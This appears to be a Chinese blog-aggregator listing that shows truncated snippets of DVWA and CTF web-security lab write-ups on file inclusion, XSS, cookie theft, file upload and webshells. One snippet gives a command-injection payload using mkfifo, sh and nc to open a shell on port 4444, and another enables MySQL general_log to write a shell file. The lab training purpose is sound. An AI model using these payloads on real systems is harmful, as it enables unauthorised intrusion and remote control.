本文介绍的是漏洞利用,以DVWA实验为例,分别介绍验证绕过,XSS利用,Cookic盗用,文件上传等漏洞的利用及实现过程。通过该课程可以了解到漏洞的原理,从而做好对应的自身防御体系。 ...
分类:
Web程序 时间:
2020-02-10 09:42:58
阅读次数:
102
行代码步骤如下,后面有详细步骤。 show global variables like '%general%'; set global general_log='on'; set global general_log_file='C:/phpStudy/PHPTutorial/WWW/yanshi. ...
分类:
Web程序 时间:
2020-02-09 14:57:22
阅读次数:
172
File Inclusion File Inclusion,意思是文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件, ...
分类:
其他好文 时间:
2020-02-09 00:27:58
阅读次数:
68
DVWA简介 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 DVWA共有十个模块,分别是Brute ...
分类:
其他好文 时间:
2020-02-07 22:27:24
阅读次数:
90
在我准备做题的时候,bugku上的这个题目打不开了,我只能百度源码在自己的phpstudy上搭建然后实验 首先可以看到题目 查看源代码 根据这段源码的意思是有三个参数:txt、file、password, 1、isset($user)是用来检测user变量是否为空,即user不能为空 2、&&后面的 ...
分类:
其他好文 时间:
2020-02-07 16:30:38
阅读次数:
85
开门见山 · 目录遍历 替换成 2. 文件包含可以使用 绝对路径 也可以 3. 可以使用文件包含来包含一个网址,或者是一个shell 远程文件 空字符绕过字符过滤 %00 ...
分类:
其他好文 时间:
2020-02-06 16:48:30
阅读次数:
122
开门见山 ·Low ·Medium ·High · 命令执行监听端口 ;mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp 4444 > /tmp/pipe nc 192.168.31.100 4444 · 反弹shell 拷贝shell文件 启动kali的apache服 ...
分类:
其他好文 时间:
2020-02-06 16:14:05
阅读次数:
88
DVWA简介 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 DVWA共有十个模块,分别是Brute ...
分类:
数据库 时间:
2020-02-04 18:47:01
阅读次数:
83
一、环境及软件 window X64 phpstudy_x64_8.1.0.1.exe 集成环境 下载地址 https://www.xp.cn/ Nginx1.15.11 MySQL5.7.26 PHP7.1.9nts composr1.9.2 下载地址 https://getcomposer.or ...
分类:
其他好文 时间:
2020-02-02 17:20:56
阅读次数:
127
简单的文件上传漏洞(靶机安全级别:low) 事先准备好一句话木马,密码为pass 上传一句话木马,显示上传路径(一般网站是不会显示路径的,这里靶机为了方便你测试漏洞,直接显示出了路径: ../../hackable/uploads/pass.php succesfully uploaded!) 我们 ...
分类:
Web程序 时间:
2020-02-02 14:14:38
阅读次数:
169
